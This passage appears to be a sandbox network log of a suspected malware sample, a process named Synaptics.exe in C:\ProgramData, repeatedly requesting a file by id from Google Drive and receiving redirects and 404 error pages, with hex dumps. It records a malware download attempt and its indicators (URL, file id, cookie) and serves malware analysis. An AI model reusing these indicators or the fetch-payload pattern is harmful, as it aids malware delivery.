                                                                                                                2024-12-30 09:58:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                52192.168.2.759847142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4Yyo7t_mivK2xbUUjs9OEev3EW2eaRiD1qP-QNNAA_yRFAutez8eqa0PXQX5A1I5MR
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-tYz4_gViYQR-hThAo-hO7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 5a 65 54 61 7a 61 6c 53 52 69 6f 71 6c 79 4d 43 73 6e 57 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="yZeTazalSRioqlyMCsnWWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                53192.168.2.759853216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k6hBPekMGB9Wu60CoSwrqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                54192.168.2.759855142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:25 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6zdLmaJDrqe4Lny51vZ7uYhNkt3qqf5UbP1eNJfuITUTLHJne6mglvD33LBi77BhoO
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-1Z9lp4RMkz4ZzILtbiW42Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 6d 34 4d 66 5a 79 37 78 34 39 70 31 4c 59 46 6f 2d 66 35 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="Mm4MfZy7x49p1LYFo-f5iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                55192.168.2.759854216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-B6JbDJvCde8WI1qyFyDrgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                56192.168.2.759860142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:25 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6HBJx5c5y2cII9vOEVh2ZkPWHXDQHkaD2M43jUy8si6gxWEYhptGBC91O9Jq8JSKZB
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-20Up88Qz9RebNg4aCshwgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:26 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:26 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 77 61 37 49 33 6d 71 74 71 79 4d 56 77 77 64 65 4b 71 31 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="mwa7I3mqtqyMVwwdeKq19Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:26 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                57192.168.2.759866216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-A8gxiCz3vkuJNavDXq5YAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                58192.168.2.759867216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FIuA5t9C9OrHpgLj7zab_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                59192.168.2.759868142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC1250INHTTP/1.1 404 Not Found
